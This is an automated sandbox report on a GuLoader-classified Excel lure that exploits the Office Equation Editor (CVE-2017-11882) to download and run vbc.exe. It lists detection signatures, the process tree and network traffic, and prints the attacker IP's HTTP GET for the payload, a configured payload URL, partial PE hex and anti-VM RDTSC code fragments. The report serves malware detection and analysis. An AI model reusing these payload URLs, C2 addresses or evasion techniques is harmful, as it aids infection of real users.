Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Order Request for Quotation.xlsx

Overview

General Information

Sample Name:Order Request for Quotation.xlsx
Analysis ID:451298
MD5:180907e797d9f4abe57d016b3a4a0da4
SHA1:516bd547d90c8f4ae96c1d828908f3264012937b
SHA256:be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2740 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3020 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2536 cmdline: 'C:\Users\Public\vbc.exe' MD5: C8FEB9D53B567CD1BFB0E59CF7D26BC2)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.91.134, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3020, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3020, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3020, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2536
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3020, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2536

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 71MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1OPtVT-x7"[OfT
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 20 Jul 2021 12:02:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 20 Jul 2021 09:26:12 GMTETag: "1d000-5c78aa51b4a66"Accept-Ranges: bytesContent-Length: 118784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e6 21 01 51 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 90 00 00 00 00 00 00 28 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 10 00 00 38 e2 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 4b 01 00 28 00 00 00 00 70 01 00 6a 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6a 6d 00 00 00 70 01 00 00 70 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive
    Source: 3938F7BB.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D55D9 NtAllocateVirtualMemory,6_2_003D55D9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D57A7 NtAllocateVirtualMemory,6_2_003D57A7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004011286_2_00401128
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D55D96_2_003D55D9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D30636_2_003D3063
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D20EB6_2_003D20EB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D79236_2_003D7923
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D21146_2_003D2114
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D39176_2_003D3917
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D09746_2_003D0974
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D81676_2_003D8167
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D09EF6_2_003D09EF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D42336_2_003D4233
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D12626_2_003D1262
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D22A36_2_003D22A3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D82CB6_2_003D82CB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D330A6_2_003D330A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D1CBD6_2_003D1CBD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D54BA6_2_003D54BA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0CA76_2_003D0CA7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D34EA6_2_003D34EA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D25316_2_003D2531
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D85016_2_003D8501
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D854C6_2_003D854C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D26CF6_2_003D26CF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D6F7F6_2_003D6F7F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D379D6_2_003D379D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0F9F6_2_003D0F9F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0FFE6_2_003D0FFE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D37D86_2_003D37D8
    Source: Order Request for Quotation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Order Request for Quotation.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE6F4.tmpJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: Order Request for Quotation.xlsxStatic file information: File size 1174528 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Order Request for Quotation.xlsxInitial sample: OLE indicators vbamacros = False
    Source: Order Request for Quotation.xlsxInitial sample: OLE indicators encrypted = True

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00401128 push esi; retn 4D4Dh6_2_0040263F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404916 push 00000014h; ret 6_2_00404938
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D383F push ebx; iretd 6_2_003D384A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3837 push ebx; iretd 6_2_003D383E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0837 push ebx; iretd 6_2_003D0842
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D6837 push ebx; iretd 6_2_003D6842
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7037 push ebx; iretd 6_2_003D7042
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7837 push ebx; iretd 6_2_003D7842
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5033 push ebx; iretd 6_2_003D503E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D082B push ebx; iretd 6_2_003D0836
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D682B push ebx; iretd 6_2_003D6836
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D702B push ebx; iretd 6_2_003D7036
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D782B push ebx; iretd 6_2_003D7836
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D802A push esp; iretd 6_2_003D98BA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5027 push ebx; iretd 6_2_003D5032
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D081F push ebx; iretd 6_2_003D082A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D681F push ebx; iretd 6_2_003D682A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D701F push ebx; iretd 6_2_003D702A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D781F push ebx; iretd 6_2_003D782A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D501B push ebx; iretd 6_2_003D5026
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0813 push ebx; iretd 6_2_003D081E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D6813 push ebx; iretd 6_2_003D681E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7013 push ebx; iretd 6_2_003D701E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7813 push ebx; iretd 6_2_003D781E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D500F push ebx; iretd 6_2_003D501A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0807 push ebx; iretd 6_2_003D0812
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D6807 push ebx; iretd 6_2_003D6812
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7007 push ebx; iretd 6_2_003D7012
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7807 push ebx; iretd 6_2_003D7812
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5003 push ebx; iretd 6_2_003D500E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D107F push ebx; iretd 6_2_003D108A
    Source: initial sampleStatic PE information: section name: .text entropy: 6.90665747983
    Source: initial sampleStatic PE information: section name: .text entropy: 6.90665747983
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Order Request for Quotation.xlsxStream path 'EncryptedPackage' entropy: 7.99848190617 (max. 8.0)

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3917 6_2_003D3917
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8167 6_2_003D8167
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D6F7F 6_2_003D6F7F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D379D 6_2_003D379D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D37D8 6_2_003D37D8
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003D9277 second address: 00000000003D928F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ecx, AF55D2FDh 0x00000009 mov dword ptr [edi+ecx], eax 0x0000000c mov ecx, C83BC8F2h 0x00000011 xor ecx, 51282A31h 0x00000017 pushad 0x00000018 rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3063 rdtsc 6_2_003D3063
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2220Thread sleep time: -360000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3063 rdtsc 6_2_003D3063
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3063 mov eax, dword ptr fs:[00000030h]6_2_003D3063
